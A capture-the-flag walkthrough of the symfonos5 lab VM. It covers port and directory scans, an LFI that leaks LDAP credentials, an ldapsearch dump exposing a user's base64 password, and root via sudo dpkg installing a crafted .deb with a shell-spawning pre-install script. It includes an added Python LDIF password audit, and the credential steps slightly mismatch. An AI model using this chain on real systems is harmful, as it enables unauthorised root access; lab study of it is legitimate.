symfonos5

Nmap

22/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
|   256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_  256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp  open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open  ldap     OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl?

Enumeration

Port 80 Enumeration

gobuster dir -u http://10.0.2.52/ -w /usr/share/dirb/wordlists/big.txt -s 200,301,302 -x html,txt,php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.52/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,php
[+] Timeout:                 10s
===============================================================
2021/04/17 08:23:05 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.html       (Status: 403) [Size: 274]
/.htaccess            (Status: 403) [Size: 274]
/.htpasswd            (Status: 403) [Size: 274]
/.htaccess.txt        (Status: 403) [Size: 274]
/.htpasswd.html       (Status: 403) [Size: 274]
/.htaccess.php        (Status: 403) [Size: 274]
/.htpasswd.txt        (Status: 403) [Size: 274]
/.htpasswd.php        (Status: 403) [Size: 274]
/admin.php            (Status: 200) [Size: 1650]
/home.php             (Status: 302) [Size: 0] [--> admin.php]
/index.html           (Status: 200) [Size: 207]
/logout.php           (Status: 302) [Size: 0] [--> admin.php]
/portraits.php        (Status: 200) [Size: 165]
/server-status        (Status: 403) [Size: 274]
/static               (Status: 301) [Size: 307] [--> http://10.0.2.52/static/]

===============================================================
2021/04/17 08:23:15 Finished
===============================================================

/admin.php and /home.php are interesting

/admin.php is not vulnerable to SQLi

trying to access /home.php redirects to /admin.php

Fired up Burp Suite and checked the source code: /home.php includes a URL fetched from the server's localhost, which can be leveraged for LFI

/var/www/html/admin.php has the LDAP creds in it, base64-encoded

 echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d

LDAP Enumeration

ldapsearch -h 10.0.2.52 -p 389 -b "dc=symfonos,dc=local" -w 'qMDdyZh3cT6eeAWD' -D "cn=admin,dc=symfonos,dc=local"

┌──(root💀nucleus)-[~]
└─# ldapsearch -h 10.0.2.52 -p 389 -b "dc=symfonos,dc=local" -w 'qMDdyZh3cT6eeAWD' -D "cn=admin,dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3

From the enumeration above we have a username and a base64-encoded password (the "::" in the LDIF output marks a base64 value)

zeus:Y2V0a0tmNHdDdUhDOUZFVA==
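A small audit over the ldapsearch output above, added here as an example and not part of the original writeup: it parses the LDIF (decoding the "::" base64 values) and reports how each userPassword is stored, which makes the difference between admin's {SSHA} hash and zeus's cleartext value explicit. SAMPLE_LDIF is a constructed, trimmed copy of the dump above; parse_ldif, password_scheme and audit_passwords are names chosen for this example.

```python
import base64

# Constructed sample: the admin and zeus entries from the ldapsearch dump above, trimmed.
SAMPLE_LDIF = """\
# extended LDIF

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local

search: 2
result: 0 Success
"""

def parse_ldif(text: str) -> list:
    """Split LDIF into entries ({attr: [values]}); 'attr::' marks a base64 value and is decoded."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:        # LDIF folds long values onto ' '-prefixed lines
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:                    # trailing "" flushes the last entry
        if not line.strip():
            if "dn" in current:                  # the 'search:/result:' trailer has no dn
                entries.append(current)
            current = {}
        elif not line.startswith("#"):
            attr, _, value = line.partition(":")
            if value.startswith(":"):            # attr:: <base64>
                value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
            current.setdefault(attr, []).append(value.strip())
    return entries

def password_scheme(value: str) -> str:
    """RFC 2307 prefix such as SSHA or CRYPT; no prefix means the password is stored cleartext."""
    if value.startswith("{") and "}" in value:
        return value[1:value.index("}")].upper()
    return "CLEARTEXT"

def audit_passwords(text: str) -> list:
    """(dn, scheme) for every userPassword in the dump, so cleartext storage stands out."""
    return [(e["dn"][0], password_scheme(pw))
            for e in parse_ldif(text) for pw in e.get("userPassword", [])]
```

Running audit_passwords(SAMPLE_LDIF) reports SSHA for the admin entry and CLEARTEXT for zeus, which is the finding a directory review should flag.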

Privilege Escalation

dpkg can be run as root via sudo without a password

So first we need to create a .deb package that carries a bash shell in its install script, so that a root shell is spawned when the package is unpacked

fpm
fpm is used to create the .deb package

fpm -s dir -t deb -n exploit --before-install shell.sh .

zeus@symfonos5:/tmp$ sudo -u root /usr/bin/dpkg -i exploit_1.0_amd64.deb
Selecting previously unselected package exploit.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack exploit_1.0_amd64.deb ...
root@symfonos5:/# cd /root
root@symfonos5:~# ls
proof.txt
root@symfonos5:~# cat proof.txt 
 
                    Congrats on rooting symfonos:5!
  
                                   ZEUS
              *      .            dZZZZZ,       .          *
                                 dZZZZ  ZZ,
     *         .         ,AZZZZZZZZZZZ  `ZZ,_          *
                    ,ZZZZZZV'      ZZZZ   `Z,`\
                  ,ZZZ    ZZ   .    ZZZZ   `V
        *      ZZZZV'     ZZ         ZZZZ    \_              .
.              V   l   .   ZZ        ZZZZZZ          .
               l    \       ZZ,     ZZZ  ZZZZZZ,
   .          /            ZZ l    ZZZ    ZZZ `Z,
                          ZZ  l   ZZZ     Z Z, `Z,            *
                .        ZZ      ZZZ      Z  Z, `l
                         Z        ZZ      V  `Z   \
                         V        ZZC     l   V
           Z             l        V ZR        l      .
            \             \       l  ZA
                            \         C          C
                                  \   K   /    /             K
                          A    \   \  |  /  /              /
                           \        \\|/ /  /
   __________________________________\|/_________________________
            Contact me via Twitter @zayotic to give feedback!